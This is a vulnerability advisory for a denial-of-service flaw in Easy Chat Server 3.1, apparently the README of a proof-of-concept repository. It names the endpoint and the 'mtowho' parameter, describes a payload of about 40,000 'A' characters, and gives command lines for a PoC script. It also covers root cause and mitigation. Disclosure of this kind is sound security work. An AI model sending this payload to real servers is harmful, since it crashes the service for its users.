# CVE-2026-36228: Easy Chat Server 3.1 Chat Message Denial of Service ## Summary Easy Chat Server 3.1 contains a denial-of-service vulnerability in chat message handling. After authenticating as a valid user and establishing a chat session, a remote attacker can submit a message request with an oversized `mtowho` recipient field. A payload of approximately 40,000 `A` characters was observed to cause the Easy Chat Server process to terminate unexpectedly. This repository is for authorized security research and local reproduction only. Do not use it against systems you do not own or have explicit permission to test. ## Discoverer Vaibhav D. Barkade ## Vulnerable Component - Vendor/Product: Easy Chat Server - Affected version: 3.1 - Component: Easy Chat Server Chat Room - Endpoint: `/body2.ghp` - Parameter: `mtowho` - Attack type: Remote - Impact: Denial of Service ## Impact An authenticated remote user can cause the chat service process to crash by sending an oversized recipient field in a chat message request. This results in loss of availability for connected users until the service is restarted. ## Reproduction The PoC is dry-run by default: ```bash python3 poc.py 127.0.0.1 80 ``` To transmit the request against an authorized lab target: ```bash python3 poc.py 127.0.0.1 80 --send ``` If an authenticated cookie is required: ```bash python3 poc.py 127.0.0.1 80 --cookie 'SESSIONID=example' --send ``` The default oversized field is: ```text mtowho=<40,000 A characters> ``` ## Expected Result On a vulnerable Easy Chat Server 3.1 instance, the server process may terminate immediately after processing the oversized chat message request. ## Root Cause The chat message handler does not safely bound or validate the length of the `mtowho` recipient parameter before processing it. ## Mitigation Enforce server-side length limits and recipient validation for `mtowho`. Reject oversized request fields before parsing or copying them into fixed-size buffers. Add defensive error handling around chat message processing and deploy the service with process supervision.